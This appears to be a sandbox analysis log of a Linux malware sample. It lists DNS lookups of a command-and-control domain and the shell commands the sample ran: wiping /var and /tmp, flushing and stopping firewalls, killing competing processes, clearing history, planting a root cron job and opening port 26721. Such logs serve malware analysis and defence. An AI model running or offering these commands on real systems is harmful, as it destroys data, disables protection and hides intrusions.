                                                Oct 6, 2024 15:53:34.513057947 CEST192.168.2.1494.16.114.2540x95aaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:34.522962093 CEST192.168.2.1494.16.114.2540x95aaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:39.321141005 CEST192.168.2.1491.217.137.370x5c6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:44.322494984 CEST192.168.2.1491.217.137.370x5c6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:49.326324940 CEST192.168.2.1491.217.137.370x5c6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:54.330120087 CEST192.168.2.1491.217.137.370x5c6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:59.333924055 CEST192.168.2.1491.217.137.370x5c6aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:05.943413019 CEST192.168.2.1451.77.149.1390xbd2bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:07.546171904 CEST192.168.2.1451.158.108.2030x44fbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:10.775684118 CEST192.168.2.1451.77.149.1390x848dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:15.777076006 CEST192.168.2.1451.77.149.1390x848dStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 6, 2024 15:52:51.177041054 CEST195.10.195.195192.168.2.140x5e69No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:52.346724987 CEST195.10.195.195192.168.2.140x5e69No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:54.687899113 CEST194.36.144.87192.168.2.140xc1bdNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:55.515621901 CEST194.36.144.87192.168.2.140xc1bdNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:58.227760077 CEST81.169.136.222192.168.2.140x7650No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:01.470021009 CEST81.169.136.222192.168.2.140x2af9No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:03.761606932 CEST81.169.136.222192.168.2.140x7650No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:04.683526039 CEST194.36.144.87192.168.2.140x3ee0No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:06.982072115 CEST81.169.136.222192.168.2.140x2af9No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:32.894608974 CEST51.158.108.203192.168.2.140xa9d3No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:05.954407930 CEST51.77.149.139192.168.2.140xbd2bNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:07.561819077 CEST51.158.108.203192.168.2.140x44fbNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:54:15.786151886 CEST51.77.149.139192.168.2.140x848dNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false

                                                System Behavior

                                                General

                                                Start time (UTC):13:51:53
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:/tmp/x86.elf
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:53
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:53
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:53
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:53
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -rf /tmp/config-err-jFiNWb /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-qf3lAyPpWVCU /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-OhEyzg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-8ySu1e /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-iKxwVi /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-ol8bni /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-LPFY4g /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-O3uVvg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-r702ki /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-CBTCVe /tmp/vmware-root_726-2957583432 /tmp/x86.elf /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-K5j1Of /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-sPszWi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-kdgXJf /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-EvKsMg /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-0DTUmj /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-fe4hsi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-K1ZmQh /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-Lb1VUf /var/log/wtmp
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "rm -rf /tmp/*"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -rf /tmp/*
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "iptables -F"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/iptables
                                                Arguments:iptables -F
                                                File size:99296 bytes
                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "pkill -9 busybox"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:51:59
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/pkill
                                                Arguments:pkill -9 busybox
                                                File size:30968 bytes
                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:02
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:02
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "pkill -9 perl"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:02
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:02
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/pkill
                                                Arguments:pkill -9 perl
                                                File size:30968 bytes
                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:04
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:04
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "pkill -9 python"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:04
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:04
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/pkill
                                                Arguments:pkill -9 python
                                                File size:30968 bytes
                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "service iptables stop"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:service iptables stop
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/basename
                                                Arguments:basename /usr/sbin/service
                                                File size:39256 bytes
                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/basename
                                                Arguments:basename /usr/sbin/service
                                                File size:39256 bytes
                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl --quiet is-active multi-user.target
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl list-unit-files --full --type=socket
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:06
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl stop iptables.service
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/sbin/iptables
                                                Arguments:/sbin/iptables -F
                                                File size:99296 bytes
                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/sbin/iptables
                                                Arguments:/sbin/iptables -X
                                                File size:99296 bytes
                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "service firewall stop"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:service firewall stop
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/basename
                                                Arguments:basename /usr/sbin/service
                                                File size:39256 bytes
                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/basename
                                                Arguments:basename /usr/sbin/service
                                                File size:39256 bytes
                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:08
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl --quiet is-active multi-user.target
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:09
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:09
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:09
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl list-unit-files --full --type=socket
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:09
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/service
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:09
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl stop firewall.service
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "history -c"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "rm -rf ~/.bash_history"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -rf /root/.bash_history
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "history -w"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:10
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "chmod +x /dev/ocmount"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/chmod
                                                Arguments:chmod +x /dev/ocmount
                                                File size:63864 bytes
                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c /dev/ocmount
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/iptables
                                                Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:99296 bytes
                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
